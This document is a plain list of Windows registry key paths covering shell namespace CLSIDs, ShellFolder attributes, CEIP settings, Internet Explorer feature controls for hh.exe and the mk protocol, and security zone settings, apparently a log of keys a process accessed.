                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{11016101-E366-4D22-BC06-4ADA335C892B}\SuppressionPolicy

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\SuppressionPolicy

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{26EE0668-A00A-44D7-9371-BEB064C98683}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{26EE0668-A00A-44D7-9371-BEB064C98683}\SuppressionPolicy

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{4336a54d-038b-4685-ab02-99bb52d3fb8b}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\SuppressionPolicy

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{450D8FBA-AD25-11D0-98A8-0800361B1103}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{450D8FBA-AD25-11D0-98A8-0800361B1103}\SuppressionPolicy

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\SuppressionPolicy

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{59031a47-3f72-44a7-89c5-5595fe6b30ee}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\SuppressionPolicy

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E}\SuppressionPolicy

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{89D83576-6BD1-4c86-9454-BEB04E94C819}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{89D83576-6BD1-4c86-9454-BEB04E94C819}\SuppressionPolicy

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\SuppressionPolicy

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{9343812e-1c37-4a49-a12e-4b2d810d956b}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{9343812e-1c37-4a49-a12e-4b2d810d956b}\SuppressionPolicy

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{98D99750-0B8A-4c59-9151-589053683D73}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{98D99750-0B8A-4c59-9151-589053683D73}\SuppressionPolicy

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\SuppressionPolicy

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\SuppressionPolicy

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{daf95313-e44d-46af-be1b-cbacea2c3065}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{daf95313-e44d-46af-be1b-cbacea2c3065}\SuppressionPolicy

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e345f35f-9397-435c-8f95-4e922c26259e}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e345f35f-9397-435c-8f95-4e922c26259e}\SuppressionPolicy

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\SuppressionPolicy

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\SuppressionPolicy

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{F3F5824C-AD58-4728-AF59-A1EBE3392799}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\SuppressionPolicy

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFolders

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\Desktop\NameSpace

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\Desktop\NameSpace\DelegateFolders

                
                HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\CallForAttributes

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\RestrictedAttributes

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORDISPLAY

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideFolderVerbs

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\UseDropHandler

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORPARSING

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsParseDisplayName

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForOverlay

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\MapNetDriveVerbs

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForInfoTip

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideInWebView

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideOnDesktopPerUser

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsAliasedNotifications

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsUniversalDelegate

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\NoFileFolderJunction

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\PinToNameSpaceTree

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HasNavigationEnum

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D}

                
                HKEY_CLASSES_ROOT\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\Attributes

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\CallForAttributes

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\RestrictedAttributes

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsFORDISPLAY

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\HideFolderVerbs

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\UseDropHandler

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsFORPARSING

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsParseDisplayName

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\QueryForOverlay

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\MapNetDriveVerbs

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\QueryForInfoTip

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\HideInWebView

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\HideOnDesktopPerUser

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsAliasedNotifications

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsUniversalDelegate

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\NoFileFolderJunction

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\PinToNameSpaceTree

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\HasNavigationEnum

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{208D2C60-3AEA-1069-A2D7-08002B30309D}

                
                HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\Attributes

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\CallForAttributes

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\RestrictedAttributes

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsFORDISPLAY

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideFolderVerbs

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\UseDropHandler

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsFORPARSING

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsParseDisplayName

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\QueryForOverlay

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\MapNetDriveVerbs

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\QueryForInfoTip

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideInWebView

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideOnDesktopPerUser

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsAliasedNotifications

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsUniversalDelegate

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\NoFileFolderJunction

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\PinToNameSpaceTree

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HasNavigationEnum

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\Attributes

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{871C5380-42A0-1069-A2EA-08002B30309D}

                
                HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32\LoadWithoutCOM

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Blocked

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Blocked

                
                HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Option

                
                HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\AppCompatibility

                
                HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\AppCompat

                
                HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{871c5380-42a0-1069-a2ea-08002b30309d}\InProcServer32

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{871C5380-42A0-1069-A2EA-08002B30309D} {000214E6-0000-0000-C000-000000000046} 0xFFFF

                
                HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SQMClient\Windows

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SQMClient\Windows\CEIPEnable

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPSampledIn

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{871C5380-42A0-1069-A2EA-08002B30309D}

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_INTERNET_SHELL_FOLDERS

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_INTERNET_SHELL_FOLDERS

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_INTERNET_SHELL_FOLDERS\hh.exe

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_INTERNET_SHELL_FOLDERS\*

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\mk\shell\

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\NavigationDelay

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IEDDE_REGISTER_PROTOCOL

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_IEDDE_REGISTER_PROTOCOL

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MkEnabled

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_MK_PROTOCOL

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_MK_PROTOCOL

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_MK_PROTOCOL\hh.exe

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_MK_PROTOCOL\*

                
                HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\

                
                HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\mk\

                
                HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\mk\*

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Name-Space Handler\mk\*\CLSID

                
                HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\*\

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\HTMLHelp\1.x\ItssRestrictions\

                
                HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck

                
                HKEY_LOCAL_MACHINE\System\Setup

                
                HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4

                
                HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\

                
                HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags

                
                HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect

                
                HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags

                
                HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags

                
                HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\hh.exe

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*

                
                HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0

                
                HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1

                
                HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2

                
                HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3

                
                HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4

                
                HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4

                
